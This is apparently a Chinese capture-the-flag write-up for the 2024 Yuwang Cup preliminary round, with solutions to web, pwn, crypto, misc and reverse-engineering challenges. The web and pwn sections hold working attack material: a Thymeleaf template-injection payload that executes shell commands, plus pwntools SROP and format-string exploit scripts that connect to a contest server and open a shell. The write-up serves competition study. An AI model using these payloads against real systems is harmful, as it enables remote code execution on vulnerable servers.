前言
经由该次CTF,参赛选手全体顿悟。
不多评价,师傅们按需食用。
正文
WEB
input_data
看到svn就想到.svn信息泄露,直接访问
打开看到很多目录,逐个访问
复现的时候发现打开就是flag,第一次做是通过svn泄露工具打的
https://github.com/admintony/svnExploit
跟着简介就能做出来
admin
dirsearch扫目录
看到根据题目admin,我们也访问admin
可以看到我们已经是admin了,我们随便填路径,发现这是一个spring框架
找有关spring的漏洞,最后试出存在Thymeleaf模板注入
这里要url encoding一下
然后就是搜别人的payload,最后拿到flag
payload:__${new java.util.Scanner(T(java.lang.Runtime).getRuntime().exec("cat /flag").getInputStream()).next()}__::
如此多的FLAG
看到登录框,我直接开始爆破,好吧,爆破不出来,猜测是有别的东西,f12看到有隐藏内容
访问看到新的提示,like eating cookie,那八成就是说线索在cookie里
找到下一个网站
ok,又到了php代码审计的时候
is_numeric($temp),判断temp是不是数字,是数字直接die
还有就是>9999,这里都可以用数组直接绕
然后看y,一个字符串两次md5内容相同,老朋友了直接上
找到原题,直接用找到的Payload
Z=base_convert(1751504350,10,36)(base_convert(784,10,36))
发现只有FFLLLLLLLLLLLaGGGGG.php没见过,访问一下
PWN
ASM
先对文件进行检查
OK啊很干净啥也没开,拉进64位ida看一眼
也是相当简洁,shift+f12看一眼
只有一个start函数
发现有后门函数那么我们可以进行简单的srop操作
exp:
from pwn import *
context(os='linux', arch='amd64', log_level='debug')
r=remote('101.200.58.4',10001)
elf = ELF('./pwn')
sigFrame=SigreturnFrame()
sigFrame.rax=59 #调用execve
sigFrame.rdi=0x40200A #binsh
sigFrame.rsi=0x0
sigFrame.rdx=0x0
sigFrame.rip=0x40102D
payload =p64(0x40103D)+ p64(0x401034)+p64(0x401030)+ p64(0x401034)+p64(0x401030)+ p64(0x401034)+p64(0x401030)+ p64(0x401034)+p64(0x401019)+flat(sigFrame) #手搓的shellcode格式可参照P3那张ida图片进行手搓,此payload中的地址分别为xor rax,rax;mov ecx, 1;shl rax,1,最后的0x401019也是调用syscall来终止,这些地址都可以直接利用
r.sendline(payload)
r.interactive()
normal pwn
检查一下保护程序,64位保护全开,拉进ida里看一眼
一眼堆题,我们进入各个程序看一眼
edit函数很正常
add函数允许我们申请小于0x1000的的堆块
诶show函数这漏洞不就来了,printf函数这存在格式化字符串漏洞,但是是非栈上的格式化字符串漏洞,到时候需要我们进行手搓更改其地址
诶后门函数,思路这不就来了,我们可以通过申请一个堆块,然后利用格式化去泄露我们的地址后将我们的返回地址改为后门函数的地址直接getshell
from pwn import *
context(os='linux',arch='arm',log_level='debug')
p=remote('101.200.58.4',5555)
def cmd(idx):
p.sendlineafter(b'our choice: ',str(idx))
def add(idx,size):
cmd(97)
p.sendlineafter(b'index: ',str(idx))
p.sendlineafter(b'size: ',str(size))
def edit(idx,cnt):
cmd(101)
p.sendlineafter(b'PFdata index: ',str(idx))
p.sendlineafter(b'Database content: ',cnt)
def show(idx):
cmd(115)
p.sendlineafter(b'ata index: ',str(idx))
add(0,0x520)
edit(0,b'%9$p')
show(0)
p.recvuntil(b'content: ')
cb=int(p.recv(12),16)-0xea0
edit(0,b'%8$p')
show(0)
p.recvuntil(b'content: ')
stack=int(p.recv(12),16)
payload="%{}c%{}$hn".format(str((stack-0x18)&0xffff),8)
edit(0,payload)
show(0)
payload="%{}c%{}$hn".format(str((cb+0xd40)&0xffff),12)
edit(0,payload)
show(0)
p.interactive()
CRYPTO
不小心
一模一样的原题
[河北银行 2022 CTF]_ctf银行
加密逻辑:
-
输入字符串处理:输入字符串 inputs 中的每个字符被转换为其ASCII值的二进制表示,然后填充到8位(一个字节)。 -
二进制字符串分组:这些8位的二进制字符串被分组,每3个一组。 -
每组转换为索引:每组二进制字符串被进一步转换为4个6位的二进制数,每个数被解释为一个0到63的十进制数,用作索引来从字符串 s 中选择字符。 -
处理不完整组:如果最后一组不足3个字符,用0填充到3个,并在输出的末尾添加相应数量的等号(=)作为填充。 -
编码结果:最终的输出是使用字符串 s 中的字符根据上述规则编码的结果。变表base64,+需要爆破
coding:utf-8
python 3.6
#from flag import flag
#import re
s = "fst3Sem8Wgnobcd9+++++uv2JKpUViFGHz0QRMyjkA7NaBC14wXYxh5OP/DEqrZIl6LT"
#assert re.match(r'^DASCTF{[a-f0-9]+}$',flag) != None
flag = "DASCTF{"
def encode(inputs):
bin_str = []
for i in inputs:
x = str(bin(ord(i))).replace('0b', '')
bin_str.append('{:0>8}'.format(x))
outputs = ""
nums = 0
while bin_str:
temp_list = bin_str[:3]
if (len(temp_list) != 3):
nums = 3 - len(temp_list)
while len(temp_list) < 3:
temp_list += ['0' * 8]
temp_str = "".join(temp_list)
temp_str_list = []
for i in range(0, 4):
temp_str_list.append(int(temp_str[i * 6:(i + 1) * 6], 2))
if nums:
temp_str_list = temp_str_list[0:4 - nums]
for i in temp_str_list:
outputs += s[i]
bin_str = bin_str[3:]
outputs += nums * '='
return outputs
#c = encode(flag)
#print(c)
s = "fst3Sem8Wgnobcd9+++++uv2JKpUViFGHz0QRMyjkA7NaBC14wXYxh5OP/DEqrZIl6LT"
h = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/='
c = '+Se++h+mFYVPJv+zb+SYK+V4dvKRKQSXJ+uzJ++zJ+uRK3JXK+bYG+'
+Se++h+mFYVPJv+zb+SYK+V4dvKRKQSXJ+uzJ++zJ+uRK3JXK+bYG+==
m = ''
for i in c:
print(s.index(i))
p = s.index(i)
m+=h
print(m)
#m = "fQ==" #
from base64 import *
import string
ss = b'0123456789abcdef-_{}'
#ss = string.printable.encode()
def aaa(idx, mm):
#print(mm, idx)
if idx>=4:
#print(idx, mm)
try:
t = b64decode(mm)
except:
return
#print(t)
for v in t:
if v not in ss:
break
else:
print("xxx ",t)
return
if mm[idx] == 'Q':
for v in "QRSTU":
if idx == 0:
aaa(idx+1, v+mm[1:])
elif idx==3:
aaa(idx+1, mm[0:3]+v)
else:
aaa(idx+1, mm[0:idx]+v+mm[idx+1:])
else:
aaa(idx+1, mm)
m = 'QEFQQ1QGezc4YWQhMQEzZQcwOWZkZjEyYQVhYQQhYQVkZDYyZQMzfQ=='
m = m[8:] #GASCTF
for v in range(0, len(m), 4):
print('---------',v,m[v: v+4])
aaa(0, m[v: v+4])
#flag{78ada113e709fdf12a5aa4aa5dd62e33}
just math
from gmpy2 import *
from Crypto.Util.number import *
from secret import FLAG,x,y
import sympy
import pylab
def calc():
y1 = sympy.diff(y,x)
y2 = sympy.diff(y1,x)
v1,v2,v3 = [],[],[]
for i in FLAG:
v1.append(y.subs('x',i))
print('v1 =',v1[:34])
for i in v1:
v2.append(y1.subs('x',i))
print('v2 =',v2[:2])
for i in v2:
v3.append(y2.subs('x',i))
print('v3 =',v3[:2])
pylab.plot(v2,v3)
pylab.show()
def rsam():
m = bytes_to_long(FLAG)
while True:
try:
p = getPrime(768)
q = getPrime(768)
n = p*q
e = 3
phi = (p-1)*(q-1)
d = invert(e,phi)
c = pow(m,e,n)
print('n =',n)
print('e =',e)
print('c =',c)
break
except:
pass
def main():
rsam()
calc()
if __name__ == '__main__':
main()
'''
n = 2260375559104345425590426977960386256287009777233277062625487017885931446911942921201492850167115455071935831283269948569220356763988762825230315520633702443866690239945242948370781975714325308306543337600783340792458991506685843729962897796956171467876531084194426101796617903015810156717396227079274786269217370618477266867389155551378798713259843750289765858717627925689021561352438080039804957145513478767641674644346609224034274906228784593435462413278410143
e = 3
c = 1683427726786225271109289808778075351906457081282891335272956455076290407290946927840180672315908981114229434899424882579823897506730018911375238394076293908946844135295984336122170362703361647325169444373502665686779049846717305377396296752361918921007897449738856962248716579014267597667341690453460130215215256776249910808564677407383996700090361822122676428069577517468851642648993930679875398568383201032360229083338487146673018350740571719960730053254352184
v1 = [3149069, 2271689, 2337632, 3068562, 67697, 2337632, 3068562, 67697, 2143547, 2543093, 1844472, 2206998, 67697, 1844472, 2686547, 2020317, 67697, 3149069, 2271689, 2081324, 67697, 2143547, 2543093, 1844472, 2206998, 67697, 2337632, 3068562, 67697, 2143547, 2543093, 1844472, 2206998, 3752378]
v2 = [59499825996845, 30963434563085]
v3 = [713997911962144, 371561214757024]
'''
注意到这个c和n是同一个数量级,估计是进行了填充,爆破一点点再开3次方
from Crypto.Util.number import *
import gmpy2
c = 1924635889210773924711378522965854207843051472146513194916783167061162458090637355250481272581703873478440579298520036474045171065792195995974658228386969780210579430878151292611702887188041669069264460156268170885354178469389132838450834398493018168203742426193822379309445968101310981520048027589913953414945962743334769252188573436970839413914815373095974184931183788899690779478585666855429821591221553873937831095720715148525794252576976891489499479497861512
n = 2260375559104345425590426977960386256287009777233277062625487017885931446911942921201492850167115455071935831283269948569220356763988762825230315520633702443866690239945242948370781975714325308306543337600783340792458991506685843729962897796956171467876531084194426101796617903015810156717396227079274786269217370618477266867389155551378798713259843750289765858717627925689021561352438080039804957145513478767641674644346609224034274906228784593435462413278410143
for k in range(2**21):
tmp = c + k*n
if gmpy2.iroot(tmp,3)[1]:
print(long_to_bytes(gmpy2.iroot(tmp,3)[0]))
easy_crypto1
https://blog.csdn.net/luochen2436/article/details/128012748
又是原题
def chinese_remainder(modulus, remainders):
Sum = 0
prod = reduce(lambda a, b: a*b, modulus)
for m_i, r_i in zip(modulus, remainders):
p = prod // m_i
Sum += r_i * (inverse(p,m_i)*p)
return Sum % prod
ns = [15863230586500684911356384742123404120213699052018048588650392009927565369685497256344682150189923131009586323640507773706997704860898682946308031020361302334248895233255911348365179153799197341744863134926804603973507415697810440916305092395180382239729550833607847524005391137474497849077097574452115379368463540087172800902210822143687014813631366360652583216269138116785489485772437870528892032119729929607857459621078790511144060710035933887337208301078892163837203412081114510143406013892393607932596921308889058909544584619676380766485493114814753878272881866907210235681877689493671668534251778397658670518117, 14144098469438619358682652828507744381697293556670717685553585719665002440476256008471235313826051740009083510860714991201047915737216102220242621674841600987122005914542061963618272275986835928673920375768272390912778741502655909281390948606467847118377641357547931472588836726339758576038273820470879637555458446243401248151675266602656677360819563744765522495640821496694918515669243614141704744848980746101569785439728585144841655665959389460512628800782742764147773150430552859331269667626942993392101897661719871375721143240270211821269260950380944670195863016621594387236339317938305273510719419578308449465183, 27563822879593503938377821960427219022565215631856333510782568496016547757945464794632272818101891677705256471714805217606503652132995136255720639088424576003650628211271025648183600635145895528466199068640094470078526413324708028578289949241288828542143203769199399500669311878391255837977932634772778594526940501234736059441483897017015324765266787399950699732518347518591167932031031320265136158304460199654008895095274754918153773566824931440342525688741289235153882699461549523425169846266597156773535163599640189457171272058311480951820887261040891344076039474315985825984444520336790670313179493074014037981261]
cs = [3833095607830862948079097323254872789586576953317671099752083261949616608759231291050566542764984974722790226120399722937104503590740358249900089784508490830379531632752169777949200718567033018577184658177019404903817920024468923715441355404672443007723525750768430895425376124679225715687382380114628103058312176343693900115638265002657622618744666247132114654135429040069316368839938881716554901593031901272992940200484460436193699175500376368456706998564064693820008778900344357745691652875500810447147088715289581351501876012044611990972521570253106671158207677490849249612002954497927762168699886110455354481924, 1502420121177211156091634258259634977709023894278792755694473756163084431123774101512866316989917922052023168401167212284219907272528117024670443698990238243030221117004372456475521502350404137469088570170885409265567084376069256924135270283335242133163303599239181417949980292944203204296598188175632723968779672994090788585343302473442389865459398142634104331743517384589200789331489394375604801951994831647339839112698394141328178967516636452592385248135340133712522135715943787590172334743893259621909532456281362868290556461907936774231166936915669816509378419892149164552548131776979706381641477878931403040942, 8992204063713908492214256291861339175525948946919629972908439132005643626148678347198381531633907182877152728077958345519083406637446972079387161726967295886447791613166577391233866583354793842121902234644830640050181130381996083089350911224037154798259291124104894554037604500881250119806371348673833105103600782286898276354573884788251542211434143476774391457587885772379990104835187104619922442613860682792470389490804228050671124495925536024571104944112397143299499508504917890140939438891891453283594000764399193028606955089853654071198909973555844004685149713774167524224100487937899126480545681565581673958854]
e = 89
m_e = chinese_remainder(ns,cs)
E2 = gmpy2.iroot(m_e,e)[0]
print(E2)
3、求解E3:第三部分代码我们可以看出来是利用p高位去求P的,但有趣的是发现最后代码出现n1 = P * Q1和n2 = P * Q2,因此n1和n2有共同的因子P,所以可以直接求他们的最大公约数得到P,即P=gmpy2.gcd(n1,n2),然后分别可以求出Q1=n1//P和Q2=n2//P。值得注意的是:
print(gmpy2.gcd(E1, phi_1))
#35
E和phi不互素,而且最后解出来m^35开方也不行。这里我们需要利用同余性质了:把m幂次的复杂度降低。我们知道:a ≡ b mod mn可变换成:a ≡ b mod m 和 a ≡ b mod n 因此有:c1 ≡ m^e1 mod P c1 ≡ m^e1 mod Q1 c2 ≡ m^e2 mod P c2 ≡ m^e2 mod Q2 再根据相乘性质可得:c3 = c1∗c2 ≡ m^e1 ∗ m^e2 mod P 接下来就可以利用中国剩余定理将这一组同余式求得一个特解,即 c1 ≡ m^e1 mod Q1 c2 ≡ m^e2 mod Q2 c3 ≡ m^e1 ∗ m^e2 mod P 然后构造新的RSA即可:
result = solve_crt([c1,c2,c3],[Q1,Q2,P])
c_m = result %n
n = Q1*Q2
e = 35
phi = (Q1-1)*(Q2-1)
d = gmpy2.invert(7,phi)
m = pow(c_m,d,n)
from Crypto.Util.number import *
import gmpy2
from libnum import *
n1 = 21655617838358037895534605162358784326495251462447218485102155997156394132443891540203860915433559917314267455046844360743623050975083617915806922096697304603878134295964650430393375225792781804726292460923708890722827436552209016368047420993613497196059326374616217655625810171080545267058266278112647715784756433895809757917070401895613168910166812566545593405362953487807840539425383123369842741821260523005208479361484891762714749721683834754601596796707669718084343845276793153649005628590896279281956588607062999398889314240295073524688108299345609307659091936270255367762936542565961639163236594456862919813549
n2 = 24623016338698579967431781680200075706241014384066250660360949684385831604822817314457973559632215801205780786144608311361063622813017396858888436529116737754653067203843306015767091585697803364656624926853551997229897087731298797904208292585562517602132663331748784390752958757661484560335406769204491939879324079089140420467301773366050084810282369044622442784113688062220370531522036512803461607049619641336524486507388232280683726065679295742456158606213294533956580462863488082028563360006966912264908424680686577344549034033470952036766850596897062924137344079889301948258438680545785139118107899367307031396309
c1 = 2615722342860373905833491925692465899705229373785773622118746270300793647098821993550686581418882518204094299812033719020077509270290007615866572202192731169538843513634106977827187688709725198643481375562114294032637211892276591506759075653224150064709644522873824736707734614347484224826380423111005274801291329132431269949575630918992520949095837680436317128676927389692790957195674310219740918585437793016218702207192925330821165126647260859644876583452851011163136097317885847756944279214149072452930036614703451352331567857453770020626414948005358547089607480508274005888648569717750523094342973767148059329557
c2 = 6769301750070285366235237940904276375318319174100507184855293529277737253672792851212185236735819718282816927603167670154115730023644681563602020732801002035524276894497009910595468459369997765552682404281557968383413458466181053253824257764740656801662020120125474240770889092605770532420770257017137747744565202144183642972714927894809373657977142884508230107940618969817885214454558667008383628769508472963039551067432579488899853537410634175220583489733111861415444811663313479382343954977022383996370428051605169520337142916079300674356082855978456798812661535740008277913769809112114364617214398154457094899399
E1 = 377312346502536339265
E2 = 561236991551738188085
P = gmpy2.gcd(n1,n2)
Q2 = n2//P
Q1 = n1//P
c = [pow(c1, gmpy2.invert(E1 // 35, (P - 1) * (Q1 - 1)), n1),
pow(c2, gmpy2.invert(E2 // 35, (P - 1) * (Q2 - 1)), n2)]
c3 = c[0]*c[1]%P
c2 = c[1] %Q2
c1 = c[0] %Q1
result = solve_crt([c1,c2,c3],[Q1,Q2,P])
phi = (Q1-1)*(Q2-1)
n = Q1*Q2
c_m = result % n
d = gmpy2.invert(7,phi)
m = pow(c_m,d,n)
flag = gmpy2.iroot(m,5)[0]
print(long_to_bytes(flag))
#flag{27dab675-9e9b-4c1f-99ab-dd9fe49c190a}
MISC
信息安全大赛的通知
ctrl+f找flag或者直接全选改色,看到有地方被选中了我们直接选上这一行,换色(一般word文档都可以这么做,有时候还会用一张白色的图片什么的挡住,也是做过很多类似的签到了)
编码转换
分别是brianfuck,jsfuck,brainfuck
直接上网站解码就行
Brainfuck/Ook!
在线JSfuck加密---hiencode.com
coding_analyse
放进厨子直接就是魔法棒显示了,点完之后发现没反应了,突发奇想有没有可能是逆序reverse,接着仍是魔法棒嘎嘎梭,也是成功挤了一波前十血
bluetooth
丢到ctf-neta一键分离所有文件
可以看到一个zip,我们打开是损坏的,先用010分析下
看到最下面一片空白,猜测是工具开发的还不够好,分离了部分无用内容,找到zip文件尾,删除多余部分
打开文件发现还是损坏的,我们使用winrar进行修复
然后解压得到flag跟key
10004583275926070044326083910251708233320797779355779208703097816305188140191914132269450797
5216294695211820293806247029887026154798297270637676463374801674229881314620340407569315152
转16进制然后进行异或
RESERVE
ez_apk
解压得到apk,重命名改后缀成zip
解压长这样,我们提取出classes.dex
放到dex-tools中
反编译成jar包,通过jadx或是jd-gui打开,就可以进行分析
找到mainactivity,一般来说加密函数就在这些地方
public boolean checkcin(String str) {
byte[] bytes = getString(R.string.key).getBytes();
char[] charArray = str.toCharArray();
char[] cArr = new char[charArray.length];
for (int i = 0; i < charArray.length; i++) {
if (charArray[i] == '_' || charArray[i] == '{' || charArray[i] == '}') {
cArr[i] = charArray[i];
} else {
if (charArray[i] < 'a' || charArray[i] > 'z') {
break;
}
cArr[i] = (char) (((((bytes[i % bytes.length] - 97) + charArray[i]) - 97) % 26) + 97);
}
}
return this.cipher.equals(new String(cArr));
}
解密脚本:
def decrypt_cin(ciphertext, key):
c_arr = []
for i, char in enumerate(ciphertext):
if char in ['_', '{', '}']:
c_arr.append(char)
elif 'a' <= char <= 'z':
key_byte = ord(key[i % len(key)]) - ord('a')
decrypted_char = chr((ord(char) - ord('a') - key_byte + 26) % 26 + ord('a'))
c_arr.append(decrypted_char)
else:
break
return ''.join(c_arr)
ciphertext = "your_encrypted_string_here"
key = "your_key_here"
decrypted_string = decrypt_cin(ciphertext, key)
print(decrypted_string)
然后对apk进行hook,提取出cipher跟key是什么就行了
Java.perform(function() {
var Resources = Java.use("android.content.res.Resources");
Resources.getString.overload("int").implementation = function(id) {
var result = this.getString(id);
if (id === 2131623973) {
console.log("Key: " + result);
}
return result;
};
var MainActivity = Java.use("com.example.re2.MainActivity");
MainActivity.checkcin.implementation = function(paramString) {
console.log("Input to checkcin: " + paramString);
var result = this.checkcin(paramString);
console.log("Cipher: " + this.cipher);
return result;
};
});
填上再跑拿到flag
机器猫
解压看到是个Python写的exe,使用工具对其进行反编译成Pyc
找到pyc文件,在线反编译成py文件
toolkk.com
看到最下面有一串很像base64加密内容,直接解密
文件分析
原题
[XCTF-Reverse] 94 school-ctf-winter-2015_whats-the-hell-500_whats-the-hell-500
结尾
原文始发于微信公众号(赛搏思安全实验室):2024御网杯初赛 WP
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论